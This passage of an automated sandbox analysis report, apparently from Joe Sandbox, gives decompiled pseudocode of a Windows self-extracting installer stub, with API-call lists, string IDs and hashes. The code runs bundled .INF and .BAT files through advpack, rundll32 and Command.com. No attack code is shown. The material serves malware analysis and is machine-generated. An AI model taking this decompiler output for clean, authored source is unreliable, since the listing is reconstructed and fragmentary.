                                                                                                                                                                                                                                              												_t79 = E00973FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                              												__eflags = _t79;
                                                                                                                                                                                                                                              												if(_t79 == 0) {
                                                                                                                                                                                                                                              													L61:
                                                                                                                                                                                                                                              													LocalFree(_t151);
                                                                                                                                                                                                                                              													goto L62;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												L58:
                                                                                                                                                                                                                                              												LocalFree(_t151);
                                                                                                                                                                                                                                              												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x978580;
													if( *0x978580 != 0) {
														E00972267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x978180;
											if( *0x978180 == 0) {
												_t146 = 0x4c7;
												E009744B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x979124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x979a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00976495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E009744B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x979124 = E00976285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E009744B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x978a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x979a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x978a38 & 0x0000ffff;
											_v380 = 0x979154;
											_v376 = _t151;
											_v372 = 0x9791e4;
											_v360 = _t97;
											if( *0x978a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x979a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x978d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x979a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x97a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x979124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x979a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x978a20;
										if( *0x978a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0097202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0097468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
                                                                                                                                                                                                                                              									if(_t108 == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									__eflags =  *0x978c42;
                                                                                                                                                                                                                                              									if( *0x978c42 != 0) {
                                                                                                                                                                                                                                              										goto L69;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                              									__eflags = _t112 == 0;
                                                                                                                                                                                                                                              									if(_t112 == 0) {
                                                                                                                                                                                                                                              										goto L69;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t118 =  *0x978a38; // 0x0
                                                                                                                                                                                                                                              								if(_t118 == 0) {
                                                                                                                                                                                                                                              									L23:
                                                                                                                                                                                                                                              									if(_t153 != 0) {
                                                                                                                                                                                                                                              										goto L31;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t146 =  &_v276;
                                                                                                                                                                                                                                              									if(E0097468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                              										goto L27;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L25;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                              									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                              										goto L62;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t140 = "USRQCMD";
                                                                                                                                                                                                                                              									L20:
                                                                                                                                                                                                                                              									_t146 =  &_v276;
                                                                                                                                                                                                                                              									if(E0097468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                              										_t153 = 1;
                                                                                                                                                                                                                                              										_v388 = 1;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L26:
                                                                                                                                                                                                                                              						_push(_t130);
                                                                                                                                                                                                                                              						_t146 = 0x104;
                                                                                                                                                                                                                                              						E00971781( &_v276, 0x104, _t130, 0x978c42);
                                                                                                                                                                                                                                              						goto L27;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t130 = "REBOOT";
                                                                                                                                                                                                                                              				_t125 = E0097468F(_t130, 0x979a2c, 4);
                                                                                                                                                                                                                                              				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                              					goto L25;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





























































                                                                                                                                                                                                                                              0x00973f57
                                                                                                                                                                                                                                              0x00973f58
                                                                                                                                                                                                                                              0x00973f63
                                                                                                                                                                                                                                              0x00973f63
                                                                                                                                                                                                                                              0x00973dbc
                                                                                                                                                                                                                                              0x00973dc0
                                                                                                                                                                                                                                              0x00973dc2
                                                                                                                                                                                                                                              0x00973de6
                                                                                                                                                                                                                                              0x00973de6
                                                                                                                                                                                                                                              0x00973de8
                                                                                                                                                                                                                                              0x00973f0b
                                                                                                                                                                                                                                              0x00973f0b
                                                                                                                                                                                                                                              0x00973f0f
                                                                                                                                                                                                                                              0x00973f13
                                                                                                                                                                                                                                              0x00973f15
                                                                                                                                                                                                                                              0x00973f1a
                                                                                                                                                                                                                                              0x00973f1c
                                                                                                                                                                                                                                              0x00973f46
                                                                                                                                                                                                                                              0x00973f47
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973f47
                                                                                                                                                                                                                                              0x00973f1e
                                                                                                                                                                                                                                              0x00973f1f
                                                                                                                                                                                                                                              0x00973f25
                                                                                                                                                                                                                                              0x00973f26
                                                                                                                                                                                                                                              0x00973f2a
                                                                                                                                                                                                                                              0x00973f2d
                                                                                                                                                                                                                                              0x00973fd9
                                                                                                                                                                                                                                              0x00973fd9
                                                                                                                                                                                                                                              0x00973fda
                                                                                                                                                                                                                                              0x00973fda
                                                                                                                                                                                                                                              0x00973fe1
                                                                                                                                                                                                                                              0x00973fe3
                                                                                                                                                                                                                                              0x00973fe3
                                                                                                                                                                                                                                              0x00973fe8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973fe8
                                                                                                                                                                                                                                              0x00973f33
                                                                                                                                                                                                                                              0x00973f37
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973f37
                                                                                                                                                                                                                                              0x00973dee
                                                                                                                                                                                                                                              0x00973dee
                                                                                                                                                                                                                                              0x00973df5
                                                                                                                                                                                                                                              0x00973fad
                                                                                                                                                                                                                                              0x00973fb9
                                                                                                                                                                                                                                              0x00973fc2
                                                                                                                                                                                                                                              0x00973fc8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973fc8
                                                                                                                                                                                                                                              0x00973dfb
                                                                                                                                                                                                                                              0x00973dfd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973e03
                                                                                                                                                                                                                                              0x00973e0a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973e15
                                                                                                                                                                                                                                              0x00973e17
                                                                                                                                                                                                                                              0x00973e19
                                                                                                                                                                                                                                              0x00973f94
                                                                                                                                                                                                                                              0x00973fa4
                                                                                                                                                                                                                                              0x00973f7c
                                                                                                                                                                                                                                              0x00973f80
                                                                                                                                                                                                                                              0x00973f8b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973f8b
                                                                                                                                                                                                                                              0x00973e2c
                                                                                                                                                                                                                                              0x00973e30
                                                                                                                                                                                                                                              0x00973e34
                                                                                                                                                                                                                                              0x00973e36
                                                                                                                                                                                                                                              0x00973f69
                                                                                                                                                                                                                                              0x00973f6e
                                                                                                                                                                                                                                              0x00973f70
                                                                                                                                                                                                                                              0x00973f76
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973f76
                                                                                                                                                                                                                                              0x00973e3c
                                                                                                                                                                                                                                              0x00973e43
                                                                                                                                                                                                                                              0x00973e47
                                                                                                                                                                                                                                              0x00973e52
                                                                                                                                                                                                                                              0x00973e56
                                                                                                                                                                                                                                              0x00973e5c
                                                                                                                                                                                                                                              0x00973e61
                                                                                                                                                                                                                                              0x00973e68
                                                                                                                                                                                                                                              0x00973e70
                                                                                                                                                                                                                                              0x00973e74
                                                                                                                                                                                                                                              0x00973e7c
                                                                                                                                                                                                                                              0x00973e80
                                                                                                                                                                                                                                              0x00973e82
                                                                                                                                                                                                                                              0x00973e82
                                                                                                                                                                                                                                              0x00973e87
                                                                                                                                                                                                                                              0x00973e87
                                                                                                                                                                                                                                              0x00973e8b
                                                                                                                                                                                                                                              0x00973e91
                                                                                                                                                                                                                                              0x00973e94
                                                                                                                                                                                                                                              0x00973e96
                                                                                                                                                                                                                                              0x00973e96
                                                                                                                                                                                                                                              0x00973e9b
                                                                                                                                                                                                                                              0x00973e9b
                                                                                                                                                                                                                                              0x00973e9f
                                                                                                                                                                                                                                              0x00973ea2
                                                                                                                                                                                                                                              0x00973ea4
                                                                                                                                                                                                                                              0x00973ea4
                                                                                                                                                                                                                                              0x00973ea9
                                                                                                                                                                                                                                              0x00973ea9
                                                                                                                                                                                                                                              0x00973ead
                                                                                                                                                                                                                                              0x00973eb3
                                                                                                                                                                                                                                              0x00973eb6
                                                                                                                                                                                                                                              0x00973eb8

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00973C11
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00973CDC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00978C42), ref: 00973D8F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00973E26
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00978C42), ref: 00973EFF
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00978C42), ref: 00973F1F
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00978C42), ref: 00973F40
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00978C42), ref: 00973F47
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00978C42), ref: 00973F76
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00978C42), ref: 00973F80
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00978C42), ref: 00973FC2
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E00971AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v527;
                                                                                                                                                                                                                                              				char _v528;
                                                                                                                                                                                                                                              				char _v1552;
                                                                                                                                                                                                                                              				CHAR* _v1556;
                                                                                                                                                                                                                                              				int* _v1560;
                                                                                                                                                                                                                                              				CHAR** _v1564;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t48;
                                                                                                                                                                                                                                              				CHAR* _t53;
                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                              				char* _t57;
                                                                                                                                                                                                                                              				char* _t58;
                                                                                                                                                                                                                                              				CHAR* _t60;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				signed char _t65;
                                                                                                                                                                                                                                              				intOrPtr _t76;
                                                                                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                                                                                              				unsigned int _t85;
                                                                                                                                                                                                                                              				CHAR* _t90;
                                                                                                                                                                                                                                              				CHAR* _t92;
                                                                                                                                                                                                                                              				char _t105;
                                                                                                                                                                                                                                              				char _t106;
                                                                                                                                                                                                                                              				CHAR** _t111;
                                                                                                                                                                                                                                              				CHAR* _t115;
                                                                                                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                                                                                                              				void* _t126;
                                                                                                                                                                                                                                              				CHAR* _t132;
                                                                                                                                                                                                                                              				CHAR* _t135;
                                                                                                                                                                                                                                              				void* _t138;
                                                                                                                                                                                                                                              				void* _t139;
                                                                                                                                                                                                                                              				void* _t145;
                                                                                                                                                                                                                                              				intOrPtr* _t146;
                                                                                                                                                                                                                                              				char* _t148;
                                                                                                                                                                                                                                              				CHAR* _t151;
                                                                                                                                                                                                                                              				void* _t152;
                                                                                                                                                                                                                                              				CHAR* _t155;
                                                                                                                                                                                                                                              				CHAR* _t156;
                                                                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                                                                              				signed int _t158;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t48 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                              				_t108 = __ecx;
                                                                                                                                                                                                                                              				_v1564 = _a4;
                                                                                                                                                                                                                                              				_v1560 = _a8;
                                                                                                                                                                                                                                              				E00971680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                              				if(_v528 != 0x22) {
                                                                                                                                                                                                                                              					_t135 = " ";
                                                                                                                                                                                                                                              					_t53 =  &_v528;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t135 = "\"";
                                                                                                                                                                                                                                              					_t53 =  &_v527;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t111 =  &_v1556;
                                                                                                                                                                                                                                              				_v1556 = _t53;
                                                                                                                                                                                                                                              				_t54 = E00971A84(_t111, _t135);
                                                                                                                                                                                                                                              				_t156 = _v1556;
                                                                                                                                                                                                                                              				_t151 = _t54;
                                                                                                                                                                                                                                              				if(_t156 == 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_push(_t111);
                                                                                                                                                                                                                                              					E00971781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                              					E0097658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t132 = _t156;
                                                                                                                                                                                                                                              					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t105 =  *_t132;
                                                                                                                                                                                                                                              						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                              					} while (_t105 != 0);
                                                                                                                                                                                                                                              					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                              					if(_t111 < 3) {
                                                                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t106 = _t156[1];
                                                                                                                                                                                                                                              					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00971680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E009766C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E009766C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00971680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00971781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E009716B3( &_v1552, 0x400, " ");
										E009716B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00972AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0097171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00971A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00971A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E009744B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x979120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x971140, _t156, 8,  &_v268) == 0) {
										 *0x979a34 =  *0x979a34 & 0xfffffffb;
										if( *0x979a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0097171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x979a34 =  *0x979a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00971680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00971680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00976CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}














































                                                                                                                                                                                                                                              0x00971c67
                                                                                                                                                                                                                                              0x00971c67
                                                                                                                                                                                                                                              0x00971c6d
                                                                                                                                                                                                                                              0x00971c72
                                                                                                                                                                                                                                              0x00971c74
                                                                                                                                                                                                                                              0x00971c74
                                                                                                                                                                                                                                              0x00971c8e
                                                                                                                                                                                                                                              0x00971c99
                                                                                                                                                                                                                                              0x00971cc0
                                                                                                                                                                                                                                              0x00971cf8
                                                                                                                                                                                                                                              0x00971d07
                                                                                                                                                                                                                                              0x00971d23
                                                                                                                                                                                                                                              0x00971d09
                                                                                                                                                                                                                                              0x00971d14
                                                                                                                                                                                                                                              0x00971d1b
                                                                                                                                                                                                                                              0x00971d1b
                                                                                                                                                                                                                                              0x00971d2b
                                                                                                                                                                                                                                              0x00971d2d
                                                                                                                                                                                                                                              0x00971d2d
                                                                                                                                                                                                                                              0x00971d38
                                                                                                                                                                                                                                              0x00971d39
                                                                                                                                                                                                                                              0x00971d46
                                                                                                                                                                                                                                              0x00971cc2
                                                                                                                                                                                                                                              0x00971cc2
                                                                                                                                                                                                                                              0x00971ccc
                                                                                                                                                                                                                                              0x00971cce
                                                                                                                                                                                                                                              0x00971cce
                                                                                                                                                                                                                                              0x00971cdb
                                                                                                                                                                                                                                              0x00971ce6
                                                                                                                                                                                                                                              0x00971cee
                                                                                                                                                                                                                                              0x00971cee
                                                                                                                                                                                                                                              0x00971e89
                                                                                                                                                                                                                                              0x00971e91
                                                                                                                                                                                                                                              0x00971e92
                                                                                                                                                                                                                                              0x00971e94
                                                                                                                                                                                                                                              0x00971e97
                                                                                                                                                                                                                                              0x00971ea4
                                                                                                                                                                                                                                              0x00971ea4
                                                                                                                                                                                                                                              0x00971c61
                                                                                                                                                                                                                                              0x00971c07
                                                                                                                                                                                                                                              0x00971bd3
                                                                                                                                                                                                                                              0x00971b7b

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00971BE7
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00971BFE
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00971C57
                                                                                                                                                                                                                                              • GetPrivateProfileIntA.KERNEL32 ref: 00971C88
                                                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00971140,00000000,00000008,?), ref: 00971CB8
                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00971D1B
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                              • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                              • API String ID: 383838535-2280873615
                                                                                                                                                                                                                                              • Opcode ID: 4ec3e225da21e3e43e60eca03cbf7e04126821bdb2177e1f116ace8d4a51ec65
                                                                                                                                                                                                                                              • Instruction ID: 6cee843182894fe953bee115477bcb233d725f5e00df13b9874ac153ba12c048
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ec3e225da21e3e43e60eca03cbf7e04126821bdb2177e1f116ace8d4a51ec65
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BA13873A082145BEB309B2CCC45BEA77AD9BC1310F14C6A5E59DA72C1EBB09EC5CB54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

Control-flow Graph

[Figure not recovered: control-flow graph of the function at 0097597D, legend Executed / Not Executed. API calls labelled on its nodes: GetCurrentDirectoryA, SetCurrentDirectoryA, GetDiskFreeSpaceA, MulDiv, GetVolumeInformationA, memset, GetLastError, FormatMessageA.]
                                                                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                                                                              			E0097597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v788;
                                                                                                                                                                                                                                              				long _v792;
                                                                                                                                                                                                                                              				long _v796;
                                                                                                                                                                                                                                              				long _v800;
